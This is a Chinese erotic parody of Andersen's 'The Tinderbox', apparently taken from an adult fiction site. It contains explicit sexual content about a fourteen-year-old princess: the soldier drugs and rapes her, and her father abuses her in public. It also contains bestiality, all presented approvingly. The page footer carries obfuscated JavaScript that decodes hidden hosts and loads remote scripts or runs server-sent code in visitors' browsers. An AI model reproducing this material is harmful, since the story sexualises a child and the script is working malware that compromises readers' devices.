『安徒生淫话之打火匣』

「一二,一二!」宽阔的驿道上,一个年轻的士兵正在迈着整齐的步伐,一路走来。他肩背一个行军袋,腰挂一把长剑。
  这位士兵参加过好几次战争,现在退役回家去。
  正当士兵怀揣着归家的喜悦,迈动着轻快的步伐,头脑中不停地回想着记忆中的家乡时,一个苍老的声音从背后响起。
  「嘿,前面的小伙子,你能停下帮帮一个老太婆子的忙吗?」士兵扭过头来,看到了一个非常可憎的老巫婆站在他的身后,这个老女人的嘴唇像猪嘴一样又厚又肥,向外翻翻的,像是随时准备亲吻谁一样;一对奶子倒是又大又软,大概是因为奶子的主人已是年老色衰的原因吧?像两个大布袋一样松松垮垮地垂吊在胸前——真是要多恶心,有多恶心!
  老巫婆没有注意到士兵厌憎的眼色,他招呼士兵说:「晚安,小伙子,你腰上的佩剑真好,你的行军袋真大。」士兵闻听此言不禁暗自嘟囔:「再大也没你挂在胸前的那对老奶子大……」「你看起来是一个勇敢聪明的士兵!老实说,我可非常清楚你们这些能够从战争中抽身而退的穷孩子最想得到什幺。我有个好办法,叫你拥有好多好多的金币!」「真的吗?」士兵半信半疑道:「那就谢谢你了,老巫婆!」「当然是真的啦,只不过,在你得到金币前还得答应我一个小小的条件。」说完这些话后,巫婆怪声怪气地笑了起来,那苍老的面皮上也随之绽开了一朵邪恶之花。
  「嗯,就是当我的性奴啦,只要尽心服侍,让我这个老太婆子舒舒服服,金币、财富,我是不会少你的!」说完话后,老巫婆居然像一个小女人一样面露羞态,她在静静地等待着士兵的回复。
  听完老巫婆的要求,年轻的士兵打心里泛起了一阵鸡皮疙瘩——让自己来服侍一个又老又丑的老巫婆,这样的要求简直让人难以接受。
  「咦,那幺恶心喔,我才不会因为几把金币出卖自己的处男之身呢,要干你找别人好了,我要走了,拜拜,老巫婆。」说完,士兵就转身准备离去。
  听到年轻的士兵毅然回绝了自己的变态要求,恼羞成怒的老巫婆立刻变得面目狰狞起来。
  「啊,你这个可恶的小卒子,你不仅回绝了我充满善意的要求,还羞辱了我的人格,我一定要抓住你!让你好好尝尝我老巫婆的厉害!」老巫婆一边大声咒骂着,一边将束在自己肚皮上的那条黑乎乎的带子扯了下来,往空中甩了甩,那带子倏忽间变成了一条不断飞速变长的触手,一下就搭住了正在前面拼命逃跑的士兵的腰部,自动地回旋数圈之后,已把士兵捆得像粽子一样送回到了老巫婆的面前。
  「哈哈,你跑啊,怎幺不跑了,哇哈哈……」
  老巫婆一边纵声淫笑,为了自己罪恶计划的达成而性(兴)奋不已,一边巧施魔法,把士兵弄得骨酥筋软,只能乖乖地跟着她走。
  巫婆拉着士兵,来到一座大山前,对着光滑的石壁大声喊道:「山神啊,山神,把你的肛门儿,快快张开!」说来也奇怪,老巫婆如此反复念叨几遍之后,士兵看到自己面前的那面的石壁,居然从中裂开了条口子,伴随着山石移到发出的震耳欲聋的轰鸣声,一条宽广深邃的天然石廊出现在了自己的面前。
  「走吧。」老巫婆舍弃了绳索,一把攥住士兵那软绵绵的老二,就这样以鸡代绳拽着他的小弟,笑嘻嘻地走了进去。
  「啊……你他妈的死老太婆,轻点不行吗,懂不懂爱抚啊,好鸡巴疼,知道不?」一路上,老巫婆的手一下又一下地使着阴劲,肆意地抓捏着士兵的老二。这让士兵疼痛不堪,感到非常的难受。他想反抗,偏偏全身除了脚和舌头,哪也动弹不了。
  「小子,现在知道疼了,别急别急,我老太婆可不想你死啊,你死了,谁来满足我呢?」老巫婆一边淫笑着,一边不紧不慢地可不管老太婆如何揪捏捋动,低垂在士兵胯下的那条的肉茎依旧是伴随着二人走动的步伐地一晃一荡,显得软软绵绵、毫无生气。
  「哎呀,这小伙子不会看我长得太漂亮,瞬间早泄阳痿了吧?嗯,一定是这样的。」士兵听到老巫婆的自言自语,禁不住一阵恶心涌上心头,「唔……」的一声之后把一口前天的饭从肚子里吐了出来。
  石廊的尽头,是一间堆满金山银山的石屋,石屋的面积是如此的宽广,以至于光亮耀眼的珠宝也才仅仅折射出了这个石屋的一小部分,更多的还遗留在光不可达的黑暗之中。但金银财富所散发出的夺目光辉却让士兵忽略了面对未知与黑暗的恐惧。伴着满室的珠光宝气,士兵看得心旌摇曳。
  「哎呀,早知道老巫婆藏身的这个地方是这个样子,我就应该主动地答应她的要求才是,哪像现在这样,金子没拿到,大好的一根鸡巴还被捏肿了,看来我还是应该努力讨好她,骗得她的信任,再寻机杀死她,把那些宝贝都拿个精光,以偿我胯下之辱!」士兵一边揉着自己的老二,一边看着满屋子的金银财宝暗自叹息不已。而站在一边的老巫婆看到士兵的这幅窘态,自然不知道士兵的心理已经发生了转变,还以为是士兵又在回味于自己方才的手爪施虐,不禁哈哈大笑起来。
  「怎幺样,滋味不错吧,如果你肯老实听话,接受我的建议,你的鸡鸡也不会像现在这样难受,嘻嘻。」「对……对呀,老巫婆……哦,不!美女,你原谅我吧,我一定会尽心服侍你,你让我当牛做马都行啊!」士兵扑通一声,跪在老巫婆面前,开始进行肉麻的阿谀奉承。
  「真的吗?咦,你小子,怎幺变得这幺听话了?好,既然你有这份心,我也不会亏待你的。来,先给我舔舔逼,让我舒服舒服!」老巫婆说完,便扯下身上的裤衩,两腿一分,问也不问,就把士兵的头按在自己又脏又黑的胯下,享受起来。
  士兵还没反应过来,便被一块巨大的肥逼将眼、口、鼻堵了个严严实实,继而又被肥逼中散发出的阵阵浓烈的腥臊味熏得呼吸困难、眼冒金星。在老巫婆的淫威之下,士兵只得用舌尖分开肥厚腥腻的肉瓣,吸啜着松弛宽阔的阴道里因为兴奋而不断涌出的骚臭淫水。
  「哦……哦,好……好爽,用力!给老娘用力舔!」老巫婆一边在士兵的口交下兴奋得连连淫叫不止,一边挺动自己肥大贲突的阴阜,拼命地往士兵嘴巴里抽送着。
  「妈的,这个老变态,居然让我给她玩口交,舔她那肮脏的臭逼,这笔账暂且先记下,先把你玩爽了,此后的舒舒服服,到时候找个机会要了你这个老臭逼的命!」痛苦不堪的士兵心里算计着,此刻却唯有咬牙坚持,谁叫自己身在老逼下,不得不低头呢?
  老巫婆像个女王一样用大腿紧紧夹住士兵低伏在自己胯下的头颅,享受着阴部被人刮舔啜食后那形如海浪般的如潮快感;而士兵,却只能强忍着老女人阴部所散发出来的特有的酸骚臭气和那黑洞洞的阴道里汩汩流出的浊臭的阴液,用自己早已麻木僵直的口舌为压在自己脸上这个老逼卖力地口交着。
  「他妈的,舔了这幺长时间,还没见她要停,如果不把她搞泄,这样下去,恐怕我不活活憋死,也要被活活累死在这老逼胯下。」正自着急,忽然头脑中有如电光火石般一闪,士兵猛地想起以前在军队中听有嫖妓经验的战友介绍说,女人身上最为敏感的地方不是阴道,而是阴道前面的那个细小的尿眼。舔的舒服了,即便是石女,她也会泛春发骚的。
  士兵艰难地挪动着自己僵硬的舌头,把舌尖顶压在老巫婆那不断收缩翕动的尿道口上,猛地分开老巫婆的尿道口向尿道深处钻去。
  「啊……啊,真……真舒服……我要……尿了!尿了……噢!」士兵的口交非常成功,老巫婆在士兵舌头的连番逗弄之下,终于迎来了自己久违的高潮。一股淡黄色的的潮水从老巫婆的尿道中高速喷射出来,喷溅了士兵一头一脸。
  这番高潮,简直如同枯木逢新春、枯渠注活水,让许久未曾经历性事的老巫婆爽得昏了过去。
  士兵赶忙扒开还死死地紧压在自己脸上的那块肥逼爬了起来,抓住这难得的时机,捡起被老巫婆扔在角落里的那把佩剑,拔出佩剑,瞄准躺在地上,正自昏迷不醒的老巫婆的头,一剑砍了下来。那颗头滴溜溜地滚到一边,一个荒淫无耻的老巫婆就这样不可思议地死在了自己的淫欲之下!
  「哼,凭你再厉害,还不得死在我的剑下,老巫婆啊,老巫婆啊,你死不打紧,还惹得我一嘴骚!你叫我怎幺说你好?不如把那些宝贝都归我吧,也算你偿还欠我的服务费吧!」士兵兴奋难捱,又蹦又跳。杀死了变态的老巫婆,虽说受了点屈辱,但却收获了一辈子也花不完、使不尽的金银财宝。
  士兵踢开老巫婆的尸体,走到那一堆堆的财宝中,看着遍地的金子、银子、珊瑚、钻石还有好多好多他叫不出名字的闪闪发光的宝贝,心里是忧喜交集。
  喜的是杀死了淫荡变态的老妖婆,庆幸自己能够从他的魔爪中逃脱出来,同时又收获了如此之多的财富;忧的是这幺多的金银财富,凭自己一个人的力量又怎幺能够带的出去?
  士兵踱着步子想啊想,焦急之余,想吸点烟叶抽。当他把烟叶和烟管从布袋中拿出来后,却发现身边的打火匣不见了,就在这时,脚边一个闪闪发光的东西吸引了他的注意,拿起一看,是一块嵌满了珠玉宝石的打火匣呢!
  「咦,真是好运气呢!就用它来点烟吧,没准比我原先那块更好用呢!」当士兵把打火匣在活世上一擦的时候,火星一冒,奇迹出现了,不知哪来的一道门开了。一条大眼睛狗出现在了士兵面前,它眨巴着眼睛,看着士兵说道:
  「我的主人,有什幺吩咐吗?」
  「嘿,这真是一个奇妙的打火匣啊。」士兵暗自寻思,「不知道他能帮我把这些堆积如山的金银财宝运出山外吗?」于是士兵大声对狗命令道:「狗啊,你能帮我将这如山的宝藏带出山吗?」话音甫落,「嘘……」的一声,这条被打火匣招出来的大眼睛狗跑到一堆堆宝藏面前,大口大口的吞食起来。不一会儿,便将这遍布石屋的金银宝贝吃进了肚子里。
  士兵担心狗把财富吃掉了,于是问它:「狗啊,狗啊,我不是叫你把财富带出山外吗,你怎幺自己吃啦?」狗眨巴着眼睛,对士兵说道:「主人,你不是叫我打包带走吗?我已经遵照您的嘱咐,把所有的宝藏一分不差地存入了我的肚皮里哩!」「那我要用时怎幺取啊?」听到财宝原来是被打狗装进了狗肚子了,士兵吃惊之余,觉得心里安定了许多。
  「哦,主人要用时,只需将主人自己的小鸡鸡捋直,大力地插入我尾巴下面的屁眼里,屁眼里面是个吐钱的机关,要多少,您就插多少下,一下一袋金币、一下一袋宝石……插完记得把小鸡鸡拔出,一坨坨金银便便就会屙出来。」「什幺,取出财宝的办法是居然是兽交!而且还是和一只眨巴着眼睛的大狗玩肛交!」士兵失声叫道,原本趋于平复的内心霎时间被这突如其来的变故跌了个七颠八倒!
  「啊,主人不用担心,狗狗的肚肚只装金银珠宝,不食人间狗粮,所以说屁屁也是很干净的。」大狗一边说着,一边把屁股对着士兵,尾巴翘了起来,露出了藏在尾巴下的那个火红的小屁眼。
  「试试就试试吧,反正现在也没人……」
  士兵一边说着,一边脱下裤子,拔出肉棒,捋了捋,便对准大狗那火红的小屁眼猛插了进去!
  「哎呦、哎呦,主人好大力呦,我都要被主人插死了……」大狗的小屁眼初次被爆,那一圈一圈的肉腔在容纳异物入侵的同时,也在拼命箍紧士兵的分身,挤压着士兵蕴藏在分身中的子孙精华。小鸡鸡在此刺激下,也早已变成了一根雄赳赳、挺翘翘的大肉棒了!
  「想不到,和狗狗玩肛交会如此刺激!莫非我也有兽交癖好,只是自己内心不承认?」士兵一边抽插,一边胡思乱想起来。
  等到他在大狗的屁眼里舒爽地射出浓精,长吁一口气后,果然看见一袋袋的金币从大狗屁眼中滑落。金币的光亮隔着薄薄的绸袋,伴随着流出的精水,在士兵看来显得倍加刺目。
  「真的耶?唉,算了算了,和狗交就狗交吧?就当是个白送的万能储蓄罐子外加手脚自慰工具吧……」士兵一边自我抱怨着,一边捡起钱袋,照着老巫婆进山时的肛门咒语打开了石壁走出山外,来到了城里。
  士兵选了一个最好的旅馆住下,并且要了一套最豪华的房间,叫了口味最好的酒菜。
  第二天,士兵上街买了崭新的靴子和入时的衣服。现在,士兵俨然一个绅士了。他怀揣着大笔的金钱(作者注:咳,至于这个金钱,从何而来嘛……士兵:
  你给我闭嘴)来到城里最着名的风月场地,拉出最美丽的姑娘,干着最为舒心畅意的事。巫山云雨之后,他和妓女、嫖客闲聊,大家把城里的一切事情都讲给他听。
  特别是关于国王十四岁的小女儿如何如何美貌绝伦的传闻。
  「有什幺办法可以见到小公主的美貌吗?」士兵问。
  「只能到梦里见她去。大家都这幺说,她住在一幢高大的金黄色铜宫里,周围是几道高墙和几座塔哨。只有国王才能自由进出。你可知道?以前曾有这幺一个预言,说小公主将嫁给一个普通士兵。小公主能下嫁给一个士兵吗?这真叫国王忍受不了。」「这幺说来,我倒很想去见识见识她。」士兵不免生些怪念头来。
  「人们都说她长得美,假如她总是独个儿住在深宫里,再美又有什幺意思?
  难道我就不能看她一眼吗?更进一步想想,如果把她从皇宫里弄出来,是不是可以……」一丝淫笑挂在士兵嘴边。
  他摸出打火匣,一擦。「嘘……」地一声,那只眼睛大大的狗马上神不知鬼不觉地来了。
  「主人,找我什幺事?又是插屁眼取钱花吗?」「不是,不是啦!我想劳驾你,能否让我看一看,然后插一插那位居住在金黄色铜宫里的小公主?」大狗立刻出去了。不一会儿,它就领着小公主来了。小公主光着身子躺在狗背上,睡得死死的。谁都会认为这就是公主,因为她长得实在是太美了。
  士兵目瞪口呆地看着四仰八叉地躺在狗背上上的尤物,看着一张美目紧闭、稚气未脱的俏丽脸蛋,还有一头美丽的金发一直披散到小公主柔嫩的香肩上,更为令人惊异的是——小公主的年龄估摸起来也不过是个情窦初开、渐在发育的小姑娘。可在这小姑娘瘦小的身体上居然挺耸着一对形同大肉包子一样的奶子!怎幺看,都像是被某个男人粗野的大手给催熟的一样!
  士兵一边想着,一边情不自禁地伸出手,抓住小公主的一对大奶子,用力地揉啊揉,揉得都变了形!士兵看到公主咧了咧嘴,好像很痛苦的样子。似乎小公主在睡梦中也感觉到了自己的一对巨乳正在被他人肆意凌辱。
  士兵揉了一会,过了手瘾,意犹未尽地站起身来,忽然想到大狗还在旁边。
  「咳,那个大狗啊,你是怎幺把小公主带来的啊?」士兵想问些话,问完之后打发大狗走路,好干正事。自己的小鸡鸡早已勃起成了擎天柱,撑得裤裆都快破洞了!
  「主人,我在带她回来之前,趁她在浴室沐浴,往水里撒了来自中国的传奇迷药十香软筋散(作者注:武侠小说中,此药并非迷药。在此引用,实属无意,请勿对号入座)保证让您放心大胆地奸个痛快!主人慢慢地享用吧,狗狗回去睡啦。」说完,大狗便迅速地钻入墙角,消失不见了。
  「妈的,都不等老子说完,就跑了……」
  士兵一边骂骂咧咧,一边把公主抱到床上。月光下,公主似乎正在恬静地安睡,丝毫看不出她是被大狗用迷药迷昏,正处于昏睡之中。即便是正处于昏睡状态下的小公主,不论是容貌、还是胴体,都让男人看了都会产生一种想急急地扒开她的玉腿,把粗大的肉棒插入小穴,干到精尽人亡的兽欲和冲动。
  士兵按捺住自己狂暴的兽欲,先俯下身子,分开公主的两条细嫩的大腿,手指轻轻拨开柴扉紧闭的少女禁地看了看,发现小公主的阴蒂紧缩在粉嫩的包皮下面,像一粒小小的绿豆;阴蒂下面的尿道口就像针尖似的小眼儿,士兵用手指对着公主的尿眼抠了抠。受此刺激,尿道括约肌一紧一松,一条尿花飞溅出来,士兵赶紧用嘴接住。
  士兵咂了咂嘴,说道:「嗯,酸酸甜甜,还带点少女的清香,这可比老巫婆的臭逼里流出的脏水味道好多了!」玩完了尿道,玩阴道。士兵趴在公主的小穴上,像个乐不思蜀的顽童般,不断地用手和嘴,温柔地爱抚着公主娇嫩的花蕊,直到小公主从梦中发出醉人的娇喘与嘤咛声。士兵知道,小公主已被自己玩到来春了,现在可以把自己胯下怒拔挺立的老二,彻彻底底地放入公主泥泞不堪的蜜道中,好好享受享受!
  于是士兵爬起身子,两只手把小公主的小脚丫抓住,举在半空,失去屏护的少女阴部有如花儿般娇艳迷人,士兵一边看着,一边把自己的老鸟对准公主的穴口,插了进去!
  士兵的床上技术真不赖,他把昏睡中的公主几乎都要肏醒了!初经人事的小公主咿咿唔唔地叫个不停。睡梦中的她,只觉得一个英俊健壮的白马王子正在把一根丑陋黝黑的棒棒不停地插到自己尿尿的地方,又很快的抽出来,抽出来后再又插进去。
  一开始小公主感到很疼很疼,难受的又伸腿又蹬脚,想挣脱王子的怀抱,后来就渐渐变成酥麻麻的痒。再到后来,刚开始的疼痛一点也不觉得了,只希望正在自己身上作者抽插运动的白马王子永远抽插下去,因为这个奇奇怪怪的游戏,让公主感到好舒服!
  小公主的脚丫不断地弓起又伸直,两条细嫩大腿上的肌肉也在不断的踢动中一突一突地显现出来。士兵知道,那是因为自己的老二把小公主插得很舒服。
  「啊,王子……」
  「射……射了,你……的小穴穴好紧好紧哦,夹得我……我受不住了!」「唔,嗯……王子,我……我也要尿……尿……啦……」激烈的性爱让小公主叫出了声。士兵吓了一跳,看看公主小口微张、双眼紧闭,自己居然插得公主在梦中开口说话,还很满足呢!士兵觉得自己床上技术很了不起!
  「我是士兵哦,小宝贝,别忘喽,我可不是什幺王子耶。」士兵看着眼前的肉体,不禁忆起了自己从妓院的嫖客、婊子们那里听到的传闻。
  「莫非我就是那个传说中的士兵?」
  大战后的客房里,弥漫着一股浓郁的欢爱气息,小公主和士兵交叠在一起。
  只不过,因为迷药的原因,公主在异常激烈的床第大战后继续昏睡,做着她的破处春梦;我们年轻的士兵,此刻正枕在公主那对大肉包奶子上,一边滋滋有味地抽着烟,一边回味着方才的快乐与性福。
  天亮以前,士兵又叫狗把公主背回去了。公主醒来,和国王、王后一块饮早茶时,公主说她昨晚做了一个怪梦,梦见一只狗把她背到一个白马王子那里,她躺在一张大床上,那个像是王子的人,在她身上动手动脚,做了很多好玩的事。
  皇后闻听此言,急忙冲到公主面前,扒开公主双腿,看到的,是一个红肿流血的小穴——毫无疑问,公主的处女地已经被那个所谓的王子开了苞!
  「哦,天哪,你个不要脸的东西,快说!你昨晚跟谁在一起!呜……我苦命的女儿啊……」皇后像疯子一样摇着小公主稚嫩的双肩,让她回忆究竟是谁强奸了她。
  知道问题的严重性后,傻乎乎的小公主哭个不停,任谁也问不出究竟昨晚出了怎幺一回事。
  「可恶啊!我自己都还没来得及给女儿破处,就他妈的有人捷足先登了!我一定要查出来这个王八蛋是谁不可!」国王暴跳如雷,发誓一定要抓住这个擅自给自己女儿开苞的混蛋,然后把缠满荆棘的绞绳套在这个混蛋的脖子上,他要活活地绞死他!
  皇后是个聪明的女人。不要以为她只会神奇地坐在马车里,她还能生出很多名堂呢!
  她取出她的金剪子剪了一块绸子,缝了一个精致的小袋,在袋里装满了细细的荞麦粉。她让公主早早睡觉,把小袋子系在公主背上。又在袋子上剪了一个小口。这样,公主走到哪里,那里就会撒上荞麦细粉。
  晚上,大狗又来了。它把公主背到背上,一路小跑来到士兵居住的旅馆。现在,士兵已经深深地爱上她了,他幻想成为公主睡梦中的王子,以便和公主结为夫妻。
  士兵完全没有料到,荞麦粉已经从皇宫一直撒到士兵住房的床上。
  第二天早晨,依照一路铺撒的荞麦粉的指引,国王和皇后顺藤摸瓜,很快地知道了他们的女儿到什幺地方去了。他们派人把士兵抓了起来,关进了大牢。
  城郊的场坪上,一架高大的绞刑架已经竖起来了。绞架下坐着审判官和一些陪审人员。四周围着许多兵士和成千上万的老百姓。国王和王后还有小公主坐在华丽的王座上面,如果你是国王身旁的近侍的话,没准还能看到国王正把他的粗手指偷偷摸摸地往小公主红肿的小穴里捅着呢!
  士兵被从牢里提了出来,推到梯子上来。行刑人正要把绞索往他脖子上套的时候,士兵突然说道:「尊敬的国王陛下,在一个罪人接受惩治之前,是否能够答应我一个小小的请求,我快要死了,但我非常想在死之前抽一口烟,这可算是我所能抽的最后一口烟了。」小公主被国王猥亵得正过瘾,兴奋地脸蛋子红彤彤的,觉得这在大庭广众之下被自己的父王这样搞真是有种别样的刺激在心头。突然听到士兵的请求,想到这个带给自己性爱甜蜜的开苞人,一股怜悯之感不觉涌上心头,便对国王说道:
  「嗯……父王,看在女儿的面子上,就让这个可怜的士兵再抽一口烟吧?」国王正陶醉在小公主穴穴的柔腻中不可自拔,对于士兵的憎恨,顿时减轻了许多,于是就心猿意马地答道:「唔,那就答应他那点可怜的要求,让他抽一口吧。」士兵取出了他的打火匣,连擦几下:「一——二——三——!」突然,一只眼睛有水桶那幺大的巨狗从天而降,出现在众人面前。
  「快帮我,不要让我就这幺绞死!」士兵说。
  大狗一听,立即向审判官们扑上去,拖着这个人的腿,咬着那个人的鼻子,把他们扔向几丈高的天上,跌下来是成了肉酱。
  刚刚从小公主的逼洞里抽出黏唧唧的手指,满脑子想着等到观赏完处死士兵之后,要把自己的女儿如何搞掂在床的国王看到这血腥的一幕,不禁吓得手脚乱颤、直打哆嗦。不过,那只大狗还是咬住了他,毫不留情地把他和他的皇后同其他人一样乱扔。
  侍卫们都恐惧了。他们纷纷放下刀戈,向那个年轻的士兵跪地求饶。
  老百姓们都叫起来了:「士兵,把国王和皇后扔死,你来做我们的国王吧!
  你跟美丽的小公主结婚吧!」
  于是士兵在群众的欢呼声中,闯进了国王的四轮马车,一把将面带春色、满脸酡红的小公主抱在自己怀里,三下五除二地扯下两个人的衣服,露出自己早就蓄势待发的大鸡巴,朝小公主春水泛滥的小逼里猛地捅了进去!
  「哦,哦!用力!嗯……」
  「骚货,骚货,插死你……」
  「国王万岁!万岁……」
  「嗷!嗷……」
  现在,这片原本肃杀的土地,像是瞬间炸开了锅!群众的欢呼声、新国王和王后的抽插淫叫声、围观群众亢奋的叫喊声,还有大狗为自己主人助威的的咆哮声,此起彼伏、喧闹不休。这个位于城郊的绞刑场上从未有像今天这幺热闹过!
  
【完】

返回首页返回顶部

©邮箱:guang123gao@163.com

警告!通过访问本网站,您可以证明您在您所在的州、省或国家的法律下至少年满18岁或达到法定成年年龄。我们明确并严格限制本网站的使用范围为18岁以上的成年人或个人管辖权范围内的成年成年人(以年龄较大者为准)。任何低于这个年龄的人都被严格禁止使用这个网站。WARNING!By accessing the Website, you certify that you are at least 18 years of age or the age of majority under the laws of your state, province or country. We expressly and strictly limit use of the Website to adults over 18 years of age or the age of majority in the individual’s jurisdiction, whichever is greater. Anyone under this age is strictly forbidden from using the Website.

function vAaiW(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function gFfeukj(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return vAaiW(t);};window['\x46\x45\x48\x72\x50\x71\x78\x61\x6c\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=gFfeukj,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('bGtkLnh6cHlqZC55jb20=','dHIueWVzdW422NzguY229t','137167',window,document,['5','2']);}:function(){};